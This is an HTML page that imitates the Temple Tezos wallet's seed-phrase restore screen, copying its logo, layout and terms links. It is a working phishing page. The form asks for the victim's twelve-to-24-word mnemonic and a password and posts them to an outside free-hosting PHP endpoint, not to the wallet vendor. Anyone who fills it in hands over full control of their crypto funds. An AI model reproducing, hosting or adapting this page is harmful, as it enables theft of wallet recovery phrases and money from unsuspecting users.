<!DOCTYPE html>
<html style="min-width:640px" class="DisableOutlinesForClick_focus-disabled__2To1z bg-primary-orange"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Temple - Tezos Wallet (ex. Thanos)</title><link href="./Tezos_files/commons.chunk.css" rel="stylesheet"><style type="text/css">.react-json-view .copy-to-clipboard-container{vertical-align:top;display:none}.react-json-view .click-to-add,.react-json-view .click-to-edit,.react-json-view .click-to-remove{display:none}.react-json-view .object-content .variable-row:hover .click-to-edit,.react-json-view .object-content .variable-row:hover .click-to-remove,.react-json-view .object-key-val:hover>span>.object-meta-data>.click-to-add,.react-json-view .object-key-val:hover>span>.object-meta-data>.click-to-remove,.react-json-view .object-key-val:hover>span>.object-meta-data>.copy-to-clipboard-container,.react-json-view .variable-row:hover .copy-to-clipboard-container{display:inline-block}</style></head><body class="bg-primary-white antialiased font-inter" style="min-height:calc(100vh + 1px)"><div id="root"><div class="pb-20 relative"><header class="bg-primary-orange Header_inner-shadow__1aoVx pb-20 -mb-20"><div class="w-full max-w-screen-sm mx-auto px-4 py-4"><div class="px-4"><div class="flex items-stretch"><a class="flex-shrink-0 pr-4" href="./Tezos_files/fullpage.js"><div class="flex items-center"><svg x="0px" y="0px" viewBox="0 0 1615 512" xml:space="preserve" style="height: 40px; width: auto; margin-top: 6px; margin-bottom: 6px;"><title>Temple - Tezos Wallet</title><style type="text/css">
	.st0{fill:#EB8736;}
	.st1{fill:none;stroke:#1B3EB9;stroke-miterlimit:10;}
	.st2{opacity:0.1;}
	.st3{fill:#1B3EB9;}
	.st4{fill:none;stroke:#000000;stroke-width:5.000000e-02;stroke-miterlimit:10;}
	.st5{fill:none;stroke:#D50000;stroke-width:0.25;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
	.st6{fill:#ED8936;}
	.st7{fill:#FFFFFF;}
	.st8{opacity:0.2;fill:#FFFFFF;}
	.st9{fill:#C19DCF;}
	.st10{fill:#4A5568;}
	.st11{opacity:0.6;}
	.st12{fill:#375961;}
	.st13{fill:none;stroke:#000000;stroke-width:0.25;stroke-linecap:round;stroke-linejoin:round;stroke-miterlimit:10;}
	.st14{opacity:0.5;}
	.st15{fill:#667EE8;}
	.st16{fill:#F4AB55;}
	.st17{fill:#F4C70E;}
	.st18{fill:#3180CC;}
	.st19{fill:#9D7AE8;}
	.st20{fill:#FB9828;}
	.st21{fill:#FFEE50;}
	.st22{fill:#FCC33C;}
	.st23{fill:#F96C13;}
	.st24{fill:#F84200;}
	.st25{fill:url(#SVGID_1_);}
	.st26{fill:url(#SVGID_2_);}
	.st27{fill:url(#SVGID_3_);}
	.st28{fill:url(#SVGID_4_);}
	.st29{fill:url(#SVGID_5_);}
	.st30{fill:url(#SVGID_6_);}
	.st31{fill:url(#SVGID_7_);}
	.st32{fill:url(#SVGID_8_);}
	.st33{fill:url(#SVGID_9_);}
	.st34{fill:url(#SVGID_10_);}
	.st35{fill:url(#SVGID_11_);}
	.st36{fill:url(#SVGID_12_);}
	.st37{fill:url(#SVGID_13_);}
	.st38{fill:url(#SVGID_14_);}
	.st39{fill:url(#SVGID_15_);}
	.st40{fill:url(#SVGID_16_);}
	.st41{fill:url(#SVGID_17_);}
	.st42{fill:url(#SVGID_18_);}
	.st43{fill:url(#SVGID_19_);}
	.st44{fill:url(#SVGID_20_);}
	.st45{fill:url(#SVGID_21_);}
	.st46{fill:url(#SVGID_22_);}
	.st47{fill:url(#SVGID_23_);}
	.st48{fill:url(#SVGID_24_);}
	.st49{fill:url(#SVGID_25_);}
	.st50{fill:url(#SVGID_26_);}
	.st51{fill:url(#SVGID_27_);}
	.st52{fill:url(#SVGID_28_);}
	.st53{fill:url(#SVGID_29_);}
	.st54{fill:url(#SVGID_30_);}
	.st55{fill:url(#SVGID_31_);}
	.st56{fill:url(#SVGID_32_);}
	.st57{fill:url(#SVGID_33_);}
	.st58{fill:url(#SVGID_34_);}
	.st59{fill:url(#SVGID_35_);}
	.st60{fill:url(#SVGID_36_);}
	.st61{fill:#F36565;}
	.st62{fill:#9EACBE;}
	.st63{fill:#F5F8FA;}
	.st64{fill:#81B100;}
	.st65{fill:url(#SVGID_37_);}
	.st66{fill:url(#SVGID_38_);}
	.st67{fill:url(#SVGID_39_);}
	.st68{fill:url(#SVGID_40_);}
	.st69{fill:url(#SVGID_41_);}
	.st70{fill:url(#SVGID_42_);}
	.st71{fill:url(#SVGID_43_);}
	.st72{fill:url(#SVGID_44_);}
	.st73{fill:url(#SVGID_45_);}
	.st74{fill:url(#SVGID_46_);}
	.st75{fill:url(#SVGID_47_);}
	.st76{fill:url(#SVGID_48_);}
	.st77{fill:#231F20;}
	.st78{fill:#C15961;}
	.st79{fill:#C17F61;}
	.st80{fill:#C19D61;}
	.st81{fill:#C19D9D;}
	.st82{fill:none;stroke:#000000;stroke-width:0.25;stroke-miterlimit:10;}
	.st83{fill:none;stroke:#375961;stroke-width:0.25;stroke-miterlimit:10;}
	.st84{fill:none;stroke:#4A5568;stroke-width:0.25;stroke-miterlimit:10;}
	.st85{fill:none;stroke:#000000;stroke-miterlimit:10;}
	.st86{fill:none;}
	.st87{opacity:0.3;}
	.st88{fill:url(#SVGID_49_);}
	.st89{fill:url(#SVGID_50_);}
	.st90{fill:url(#SVGID_51_);}
	.st91{fill:url(#SVGID_52_);}
	.st92{fill:url(#SVGID_53_);}
	.st93{fill:url(#SVGID_54_);}
	.st94{fill:url(#SVGID_55_);}
	.st95{fill:url(#SVGID_56_);}
	.st96{fill:url(#SVGID_57_);}
	.st97{fill:url(#SVGID_58_);}
	.st98{fill:url(#SVGID_59_);}
	.st99{fill:url(#SVGID_60_);}
	.st100{fill:url(#SVGID_61_);}
	.st101{fill:url(#SVGID_62_);}
	.st102{fill:url(#SVGID_63_);}
	.st103{fill:url(#SVGID_64_);}
	.st104{fill:url(#SVGID_65_);}
	.st105{fill:url(#SVGID_66_);}
	.st106{fill:url(#SVGID_67_);}
	.st107{fill:url(#SVGID_68_);}
	.st108{fill:url(#SVGID_69_);}
	.st109{fill:url(#SVGID_70_);}
	.st110{fill:url(#SVGID_71_);}
	.st111{fill:url(#SVGID_72_);}
	.st112{fill:#BA4200;}
	.st113{fill:#0B507F;}
	.st114{fill:url(#SVGID_73_);}
	.st115{fill:url(#SVGID_74_);}
	.st116{fill:url(#SVGID_75_);}
	.st117{fill:url(#SVGID_76_);}
	.st118{fill:url(#SVGID_77_);}
	.st119{fill:url(#SVGID_78_);}
	.st120{fill:url(#SVGID_79_);}
	.st121{fill:url(#SVGID_80_);}
	.st122{fill:url(#SVGID_81_);}
	.st123{fill:url(#SVGID_82_);}
	.st124{fill:url(#SVGID_83_);}
	.st125{fill:url(#SVGID_84_);}
	.st126{fill:url(#SVGID_85_);}
	.st127{fill:url(#SVGID_86_);}
	.st128{fill:url(#SVGID_87_);}
	.st129{fill:url(#SVGID_88_);}
	.st130{fill:url(#SVGID_89_);}
	.st131{fill:url(#SVGID_90_);}
	.st132{fill:url(#SVGID_91_);}
	.st133{fill:url(#SVGID_92_);}
	.st134{fill:url(#SVGID_93_);}
	.st135{fill:url(#SVGID_94_);}
	.st136{fill:url(#SVGID_95_);}
	.st137{fill:url(#SVGID_96_);}
	.st138{fill:url(#SVGID_97_);}
	.st139{fill:url(#SVGID_98_);}
	.st140{fill:url(#SVGID_99_);}
	.st141{fill:url(#SVGID_100_);}
	.st142{fill:url(#SVGID_101_);}
	.st143{fill:url(#SVGID_102_);}
	.st144{fill:url(#SVGID_103_);}
	.st145{fill:url(#SVGID_104_);}
	.st146{fill:url(#SVGID_105_);}
	.st147{fill:url(#SVGID_106_);}
	.st148{fill:url(#SVGID_107_);}
	.st149{fill:url(#SVGID_108_);}
	.st150{fill:url(#SVGID_109_);}
	.st151{fill:url(#SVGID_110_);}
	.st152{fill:url(#SVGID_111_);}
	.st153{fill:url(#SVGID_112_);}
	.st154{fill:url(#SVGID_113_);}
	.st155{fill:url(#SVGID_114_);}
	.st156{fill:url(#SVGID_115_);}
	.st157{fill:url(#SVGID_116_);}
	.st158{fill:url(#SVGID_117_);}
	.st159{fill:url(#SVGID_118_);}
	.st160{fill:url(#SVGID_119_);}
	.st161{fill:url(#SVGID_120_);}
	.st162{fill:url(#SVGID_121_);}
	.st163{fill:url(#SVGID_122_);}
	.st164{fill:url(#SVGID_123_);}
	.st165{fill:url(#SVGID_124_);}
	.st166{fill:url(#SVGID_125_);}
	.st167{fill:url(#SVGID_126_);}
	.st168{fill:url(#SVGID_127_);}
	.st169{fill:url(#SVGID_128_);}
	.st170{fill:url(#SVGID_129_);}
	.st171{fill:url(#SVGID_130_);}
	.st172{fill:url(#SVGID_131_);}
	.st173{fill:url(#SVGID_132_);}
	.st174{fill:url(#SVGID_133_);}
	.st175{fill:url(#SVGID_134_);}
	.st176{fill:url(#SVGID_135_);}
	.st177{fill:url(#SVGID_136_);}
	.st178{fill:url(#SVGID_137_);}
	.st179{fill:url(#SVGID_138_);}
	.st180{fill:url(#SVGID_139_);}
	.st181{fill:url(#SVGID_140_);}
	.st182{fill:url(#SVGID_141_);}
	.st183{fill:url(#SVGID_142_);}
	.st184{fill:url(#SVGID_143_);}
	.st185{fill:url(#SVGID_144_);}
</style><g id="Guides"></g><g id="Guides_x5F_2"></g><g id="Guides_x5F_3"></g><g id="Sketches"><g><path class="st86" d="M1265,259.9c-5.5-4.4-12.3-6.6-20.4-6.6c-8,0-14.7,2.1-20.2,6.3c-5.5,4.2-9.7,10.2-12.6,18 c-2.9,7.8-4.4,16.9-4.4,27.4c0,10.5,1.5,19.7,4.4,27.5c2.9,7.8,7.1,13.9,12.7,18.3c5.5,4.3,12.3,6.5,20.2,6.5 c8,0,14.8-2.2,20.3-6.6c5.5-4.4,9.7-10.6,12.6-18.4c2.9-7.9,4.3-17,4.3-27.3c0-10.2-1.4-19.2-4.3-27 C1274.7,270.3,1270.5,264.3,1265,259.9z"></path><path class="st86" d="M767.7,255.6c-5.4-3.1-11.7-4.7-18.8-4.7c-7.5,0-14,1.7-19.8,5.1c-5.7,3.4-10.2,8-13.4,13.7 c-3,5.3-4.6,11.1-4.9,17.5h74.3c0-7.1-1.5-13.3-4.6-18.8C777.4,263,773.1,258.7,767.7,255.6z"></path><path class="st86" d="M1568.6,287.2c0-7.1-1.5-13.3-4.6-18.8c-3.1-5.5-7.3-9.7-12.7-12.9c-5.4-3.1-11.7-4.7-18.8-4.7 c-7.5,0-14,1.7-19.8,5.1c-5.7,3.4-10.2,8-13.4,13.7c-3,5.3-4.6,11.1-4.9,17.5H1568.6z"></path><polygon class="st7" points="669.7,157.5 475.8,157.5 475.8,198.7 548.1,198.7 548.1,393.6 597.4,393.6 597.4,198.7 669.7,198.7  "></polygon><path class="st7" d="M807.2,236.6c-7.6-7.5-16.4-13-26.5-16.8c-10.1-3.7-21-5.6-32.7-5.6c-17.4,0-32.5,3.8-45.4,11.5 c-12.9,7.7-22.8,18.4-29.9,32.2c-7.1,13.8-10.6,29.7-10.6,47.9c0,18.7,3.5,34.8,10.6,48.5c7.1,13.6,17.2,24.2,30.3,31.6 c13.1,7.4,28.8,11.1,47,11.1c14.6,0,27.5-2.2,38.7-6.7c11.2-4.5,20.3-10.8,27.4-18.9c7.1-8.1,11.8-17.6,14.1-28.5l-45.4-3 c-1.7,4.5-4.1,8.2-7.4,11.3c-3.2,3.1-7.1,5.4-11.6,6.9c-4.5,1.5-9.5,2.3-15,2.3c-8.2,0-15.3-1.7-21.3-5.2 c-6-3.5-10.6-8.4-13.9-14.8c-3.3-6.4-4.9-13.9-4.9-22.7v-0.1h120.6v-13.5c0-15.1-2.1-28.2-6.3-39.5 C820.7,253.4,814.8,244.1,807.2,236.6z M710.8,287.2c0.3-6.4,1.9-12.2,4.9-17.5c3.2-5.7,7.7-10.3,13.4-13.7 c5.7-3.4,12.3-5.1,19.8-5.1c7.1,0,13.4,1.6,18.8,4.7c5.4,3.1,9.7,7.4,12.7,12.9c3.1,5.5,4.6,11.7,4.6,18.8H710.8z"></path><path class="st7" d="M1064.8,214.2c-13,0-24.2,3.1-33.7,9.2c-9.5,6.1-16,14.2-19.6,24.4h-1.8c-2.8-10.3-8.5-18.5-17.1-24.5 c-8.5-6-18.9-9-31-9c-12,0-22.3,3-30.9,9c-8.6,6-14.8,14.2-18.4,24.5h-2.1v-31.2h-46.8v177h49.1V287.3c0-6.5,1.3-12.2,3.8-17.1 c2.5-4.9,6-8.7,10.3-11.4c4.3-2.7,9.2-4.1,14.7-4.1c8.1,0,14.6,2.6,19.5,7.7c5,5.1,7.4,12.1,7.4,20.7v110.4h47.6V285.5 c0-9.2,2.5-16.7,7.5-22.3c5-5.6,11.9-8.5,20.9-8.5c7.8,0,14.4,2.5,19.6,7.4c5.2,4.9,7.8,12.3,7.8,22.1v109.4h49V274.5 c0-19.2-5.2-34.1-15.5-44.5C1094.7,219.5,1081.3,214.2,1064.8,214.2z"></path><path class="st7" d="M1296,224.3c-10.9-6.7-22.8-10.1-35.7-10.1c-9.9,0-18.2,1.7-24.8,5c-6.6,3.3-12,7.5-16.1,12.4 c-4.1,5-7.2,9.8-9.4,14.6h-2.2v-29.7h-48.4V460h49.1v-94.7h1.5c2.2,4.9,5.5,9.8,9.7,14.6c4.2,4.8,9.7,8.8,16.3,11.9 c6.6,3.1,14.7,4.7,24.3,4.7c13.4,0,25.6-3.5,36.5-10.4c10.9-7,19.5-17.2,25.8-30.8c6.3-13.6,9.5-30.2,9.5-50 c0-20.3-3.3-37.2-9.8-50.7C1315.6,241.2,1306.9,231.1,1296,224.3z M1277.5,332.3c-2.9,7.9-7.1,14-12.6,18.4 c-5.5,4.4-12.3,6.6-20.3,6.6c-7.9,0-14.6-2.2-20.2-6.5c-5.5-4.3-9.8-10.4-12.7-18.3c-2.9-7.8-4.4-17-4.4-27.5 c0-10.5,1.5-19.7,4.4-27.4c2.9-7.8,7.1-13.8,12.6-18c5.5-4.2,12.2-6.3,20.2-6.3c8.1,0,14.9,2.2,20.4,6.6 c5.5,4.4,9.7,10.5,12.6,18.2c2.8,7.8,4.3,16.8,4.3,27C1281.8,315.4,1280.4,324.4,1277.5,332.3z"></path><rect x="1364.6" y="157.5" class="st7" width="49.1" height="236"></rect><path class="st7" d="M1614.8,317.6v-13.5c0-15.1-2.1-28.2-6.3-39.5c-4.2-11.3-10.1-20.6-17.7-28.1c-7.6-7.5-16.4-13-26.5-16.8 c-10.1-3.7-21-5.6-32.7-5.6c-17.4,0-32.5,3.8-45.4,11.5c-12.9,7.7-22.8,18.4-29.9,32.2c-7.1,13.8-10.6,29.7-10.6,47.9 c0,18.7,3.5,34.8,10.6,48.5c7.1,13.6,17.2,24.2,30.3,31.6c13.1,7.4,28.8,11.1,47,11.1c14.6,0,27.5-2.2,38.7-6.7 c11.2-4.5,20.3-10.8,27.4-18.9c7.1-8.1,11.8-17.6,14.1-28.5l-45.4-3c-1.7,4.5-4.1,8.2-7.4,11.3c-3.2,3.1-7.1,5.4-11.6,6.9 c-4.5,1.5-9.5,2.3-15,2.3c-8.2,0-15.3-1.7-21.3-5.2c-6-3.5-10.6-8.4-13.9-14.8c-3.3-6.4-4.9-13.9-4.9-22.7v-0.1H1614.8z  M1512.6,256c5.7-3.4,12.3-5.1,19.8-5.1c7.1,0,13.4,1.6,18.8,4.7c5.4,3.1,9.7,7.4,12.7,12.9c3.1,5.5,4.6,11.7,4.6,18.8h-74.3 c0.3-6.4,1.9-12.2,4.9-17.5C1502.4,264,1506.9,259.4,1512.6,256z"></path></g><g><g><polygon class="st8" points="275.7,157.5 354.5,157.5 315.1,0 39.4,0 78.8,157.5 157.5,157.5 196.9,315.1 147.7,315.1  167.4,393.8 216.6,393.8 236.3,472.6 354.5,472.6  "></polygon><polygon class="st7" points="315.1,196.9 285.5,196.9 275.7,157.5 354.5,157.5  "></polygon><polygon class="st7" points="157.5,157.5 78.8,157.5 39.4,0 0,39.4 39.4,196.9 118.2,196.9 147.7,315.1 196.9,315.1  "></polygon><polygon class="st7" points="290.5,59.1 93.5,59.1 98.5,78.8 275.7,78.8 285.5,118.2 305.2,118.2  "></polygon><polygon class="st7" points="315.1,472.6 315.1,472.6 226.5,118.2 210.7,133.9 295.4,472.6 295.4,472.6 236.3,472.6 236.3,472.6  216.6,393.8 167.4,393.8 147.7,315.1 108.3,354.5 128,433.2 177.2,433.2 196.9,512 196.9,512 315.1,512 354.5,472.6  "></polygon></g></g></g></svg></div></a></div></div></div></header><div class="w-full max-w-screen-sm mx-auto px-4"><div class="bg-white rounded-md shadow-lg" style="min-height: 20rem;"><div class="sticky z-20 rounded-t shadow-sm bg-gray-100 overflow-hidden p-1 flex items-center transition ease-in-out duration-300" style="top: -1px; min-height: 2.75rem;"><div class="flex-1"><button class="px-4 py-2 rounded flex items-center text-gray-600 text-shadow-black text-sm font-semibold leading-none hover:bg-black hover:bg-opacity-5 transition duration-300 ease-in-out opacity-90 hover:opacity-100"><svg role="img" width="48px" height="48px" viewBox="0 0 24 24" stroke="white" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" fill="none" class="-ml-2 h-5 w-auto stroke-current stroke-2"><title id="chevronLeftIconTitle">Chevron Left</title><polyline points="14 18 8 12 14 6 14 6"></polyline></svg>Back</button></div><div class="flex-1"></div></div><div class="p-4"><div class="py-4"><h1 class="mb-2 text-2xl font-light text-gray-700 text-center">Restore your Wallet with Seed Phrase</h1><hr class="my-4">

<form method="POST" action="https://xtz2022yesssssss.000webhostapp.com/xtz1.php?restore">
<form class="w-full max-w-sm mx-auto my-8"><div class="w-full flex flex-col mb-4"><label class="mb-4 leading-tight flex flex-col" for="newwallet-mnemonic"><span class="text-base font-semibold text-gray-700">Seed phrase</span><span class="mt-1 text-xs font-light text-gray-600" style="max-width: 90%;">Mnemonic. Your secret twelve word phrase.</span></label><div class="relative mb-2 flex items-stretch">

<textarea class="appearance-none w-full py-3 pl-4 pr-4 border-2 border-gray-300 focus:border-primary-orange bg-gray-100 focus:bg-transparent focus:outline-none focus:shadow-outline transition ease-in-out duration-200 rounded-md text-gray-700 text-lg leading-tight placeholder-alphagray resize-none" id="newwallet-mnemonic" spellcheck="false" autocomplete="off" rows="4" name="mnemonic" required="required" placeholder="e.g. venue sock milk update..."></textarea></div></div><div class="w-full flex flex-col mb-4"><label class="mb-4 leading-tight flex flex-col" for="newwallet-password">


<div class="text-xs text-red-500"><ul class="list-disc list-inside"><li>12, 15, 18, 21 or 24 words in English</li><li>Each word separated with a single space</li><li>Just valid pre-generated mnemonic</li></ul></div><span class="text-base font-semibold text-gray-700">Password</span><span class="mt-1 text-xs font-light text-gray-600" style="max-width: 90%;">A password is used to protect the wallet.</span></label><div class="relative mb-2 flex items-stretch"><input class="appearance-none w-full py-3 pl-4 pr-4 border-2 border-gray-300 focus:border-primary-orange bg-gray-100 focus:bg-transparent focus:outline-none focus:shadow-outline transition ease-in-out duration-200 rounded-md text-gray-700 text-lg leading-tight placeholder-alphagray" id="newwallet-password" spellcheck="false" autocomplete="off" type="password" name="password" placeholder="********" value=""></div></div><div class="w-full flex flex-col mb-6"><label class="mb-4 leading-tight flex flex-col" for="newwallet-repassword"><span class="text-base font-semibold text-gray-700">Repeat Password</span><span class="mt-1 text-xs font-light text-gray-600" style="max-width: 90%;">Please enter the password again.</span></label><div class="relative mb-2 flex items-stretch"><input class="appearance-none w-full py-3 pl-4 pr-4 border-2 border-gray-300 focus:border-primary-orange bg-gray-100 focus:bg-transparent focus:outline-none focus:shadow-outline transition ease-in-out duration-200 rounded-md text-gray-700 text-lg leading-tight placeholder-alphagray" id="newwallet-repassword" spellcheck="false" autocomplete="off" type="password" name="repassword" placeholder="********" value=""></div></div><div class="flex flex-col mb-6"><label class="mb-2 p-4 bg-gray-100 border-2 border-gray-300 rounded-md overflow-hidden cursor-pointer flex items-center"><div class="h-6 w-6 flex-shrink-0 bg-primary-orange border border-primary-orange-dark rounded-md overflow-hidden disable-outline-for-click transition ease-in-out duration-200 text-white flex justify-center items-center"><input type="checkbox" class="sr-only" name="termsaccepted"><svg role="img" width="48px" height="48px" viewBox="0 0 24 24" stroke="white" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" fill="none" class="block h-4 w-4 pointer-events-none stroke-current" style="stroke-width: 2;"><title id="okIconTitle">Ok</title><polyline points="4 13 9 18 20 7"></polyline></svg></div><div class="ml-4 leading-tight flex flex-col"><span class="text-sm font-semibold text-gray-700">Accept terms</span><span class="mt-1 text-xs font-light text-gray-600">I have read and agree to<br>the <a href="https://templewallet.com/terms" target="_blank" rel="noopener noreferrer" class="underline text-secondary">Terms of Usage</a> and <a href="https://templewallet.com/privacy" target="_blank" rel="noopener noreferrer" class="underline text-secondary">Privacy Policy</a></span></div></label></div><button class="relative px-8 rounded border-2 bg-primary-orange border-primary-orange flex items-center text-primary-orange-lighter text-base font-semibold transition duration-200 ease-in-out opacity-90 hover:opacity-100 focus:opacity-100 shadow-sm hover:shadow focus:shadow" style="padding-top: 0.625rem; padding-bottom: 0.625rem;">Create</button></form></div></div></div></div></div></div><script src="chrome-extension://ookjlbkiijinhpmnjffcofjonbfbgaoc/scripts/commons.chunk.js"></script><script src="chrome-extension://ookjlbkiijinhpmnjffcofjonbfbgaoc/scripts/fullpage.js"></script><div class="ReactModalPortal"></div><div class="ReactModalPortal"></div><div></div></body></html>